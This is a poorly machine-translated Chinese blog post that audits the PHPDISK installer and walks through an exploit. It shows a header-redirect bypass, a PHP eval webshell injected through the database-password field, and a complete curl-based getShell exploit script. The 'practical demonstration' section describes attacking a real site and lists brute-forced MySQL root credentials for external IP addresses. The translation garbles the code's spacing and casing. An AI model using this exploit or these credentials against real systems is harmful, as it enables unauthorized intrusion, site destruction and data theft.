Phpdisk vulnerability released-phpdisk header bypass & amp; getShell exp

Author: Yaseng Team: CodePlay
1: Code Audit
The PHPDISK Network Disk System is a network hard disk (File Storage Management) system built using PHP and MySQL widely in China. I found a very interesting stuff in the source code analysis .....
 
 

Figure 1
 
Figure 1 shows index. php under install, and the program installation file. It looks like the normal code. When the system is installed, a lock file is generated, and the code is determined by executing install again. Here, he uses a Header, while the wood has exit. However, after the php header jumps, the code is still executed backward. You can directly post the data and check the file again.
 
 



 
Figure 2
 
The installation process depends on $ step, and the step can be controlled by POST. Continue to find available locations
 
$ Str = "<? Php ". LF. LF;
 
$ Str. = "// This is PHPDISK auto-generated file. Do NOT modify me.". LF. LF;
 
$ Str. = "\ $ configs = array (". LF. LF;
 
$ Str. = "\ t 'dbhost' => '$ dbhost',". LF. LF;
 
$ Str. = "\ t 'dbname' => '$ dbname',". LF. LF;
 
$ Str. = "\ t 'dbuser' => '$ dbuser',". LF. LF;
 
$ Str. = "\ t 'dbpasswd' => '$ dbpasswd',". LF. LF;
 
$ Str. = "\ t 'pconnect '=> 0,". LF. LF;
 
$ Str. = "\ t 'tpf '=> 'pd _',". LF. LF;
 
$ Str. = "\ t 'charset' => '$ charset',". LF. LF;
 
$ Str. = "\ t 'debug' => '0',". LF. LF;
 
$ Str. = ");". LF. LF;
 
$ Str. = "define ('admincp', 'admincp');". LF;
 
$ Str. = "?> ". LF;
 
$ Fp = fopen ($ config_file, 'w ');
 
If (! $ Fp ){
 
Exit ("Can not open file <B> $ config_file </B> .");
 
}
 
If (is_writable ($ config_file )){
 
If (@ fwrite ($ fp, $ str )){
 
$ Msg. = "<font color = blue> {$ config_file}". _ ('write _ success '). "</font> ";
 
} Else {
 
Post Data is written to the configuration file configs. inc. php, which can be used to continue the visual test.
 
Function stripslashes_array (& $ array ){
 
If (is_array ($ array )){
 
Foreach ($ array as $ k => $ v ){
 
$ Array [$ k] = stripslashes_array ($ v );
 
}
 
} Else if (is_string ($ array )){
 
$ Array = stripslashes ($ array );
 
}
 
Return $ array;
 
}
 
If (@ get_magic_quotes_gpc ()){
 
$ _ GET = stripslashes_array ($ _ GET );
 
$ _ POST = stripslashes_array ($ _ POST );
 
}
 
Haha, for ease of installation, we have removed gpc and can directly write the Trojan horse.
2: vulnerability Exploitation & getShell Method
Find the place where the configuration is written
 
$ _ L = mysql_connect ($ dbhost, $ dbuser, $ dbpasswd) or die (_ ('could _ not_connect '). mysql_error ());
 
If (! Mysql_select_db ($ dbname, $ _ l )){
 
Mysql_query ("create database '{$ dbname}';") or die (_ ('invalid _ query'). mysql_error ());
 
}
 
@ Mysql_close ($ _ l );
 
Verify whether the database can be connected. If the wrong database information is exited, it seems that it cannot be written in disorder. You can only work on dbpasswd.
 
First, yy the configs. inc. php file under system.
 
'Dbpasswd' => '',);?> <? Php eval ($ _ POST ['y']);?> ',
 
You can connect it directly with a kitchen knife.
 
Because there is no evil gpc, directly POST a 'dbpasswd' = '',);?> <? Php eval ($ _ POST ['y']);?> '
 
That is, the password is: ',);?> <? Php eval ($ _ POST ['y']);?>
 
In this case, the data packet to be post is www.2cto.com.
 
$ Pass = '\',);?> <? Php eval ($ _ POST [\ 'y \ ']);?> ';
 
$ Data = "step = 5 & dbhost = localhost & dbuser = yaseng & dbname = yaseng & dbpasswd =". $ pass;
 
When the database information is correct, a Trojan is successfully written.
 
 


 
Figure 4
 
Successfully written to shell
 
3: Compile getShell exp
 
End yy. We will use the powerful curl exp in php. We have constructed the data transmitted by post in the previous article. Then, check whether getShell is performed based on the features. The specific code is as follows (for the complete exp, see the attachment ).
 
$ Site = $ argv [1]; // imported website
 
$ Url = $ site. "/install/index. php ";
 
$ Pass = '\',);?> <? Php eval ($ _ POST [\ 'y \ ']);?> ';
 
$ Data = "step = 5 & dbhost = 98.126.4.252 & dbuser = root & dbname = mysql & dbpasswd =". $ pass; // exploit data
 
$ Ch = curl_init ($ url );
 
Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
 
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1 );
 
Curl_setopt ($ ch, CURLOPT_POST, true );
 
Curl_setopt ($ ch, CURLOPT_POSTFIELDS, $ data); // send post data
 
$ Result = curl_exec ($ ch );
 
Curl_close ($ ch );
 
$ Shell = "http: //". $ site. '/system/configs. inc. php ';
 
If (strpos (@ file_get_contents ($ shell), 'pconnect ') {// check whether the connection is successful
 
Echo "Hi guy I get the Shell:". $ shell;
 
} Else {
 
Echo "Shit !!! This Site: $ site Can not get Shell ";
 
}
 
4: practical demonstration
 
In fact, this method of using shell is extremely wicked and destroys configs. inc. php, causing the whole site to crash. I found a relatively new site (no one in the Visual Test). Forgive me ...... Practice.
 
I am looking for external databases. I have found x shells in the kitchen knife, but I am not allowed to contact anyone. I asked a friend for a mysql root brute-force cracking tool and cracked a batch of root users.
 
The database is successfully accessed... 98.126.4.252 root password
 
The database is successfully accessed... 98.126.4.253 root password
 
The database is successfully accessed... 98.126.4.250 root password
 
The database is successfully accessed... 98.126.4.20.root passwd
 
The database is successfully accessed... 98.126.4.254 root password
 
The database is successfully accessed... 98.126.4.252 root root123456
 
The database is successfully accessed... 98.126.4.253 root root123456
 
 
 
Find a local adminer (a single file php MySQL management client) and change the password. The data sent at this time is (if not, please replace the mysql with external links)
 
$ Pass = '\',);?> <? Php eval ($ _ POST [\ 'y \ ']);?> ';
 
$ Data = "step = 5 & dbhost = 98.126.4.252 & dbuser = root & dbname = mysql & dbpasswd =". $ pass;
 
Run Php phpdisk. php www.2cto.com in the php command line.
 
 

 
 
Done, written successfully, and connected with a kitchen knife.
 
 


 
Ko !!!
 
4: Conclusion
 
This article is a typical article about headers directly jump and bypass. php functions are powerful and simple to use. At the same time, we have to use dangerous functions such as Header, preg_replace, and eval with caution to avoid unauthorized use.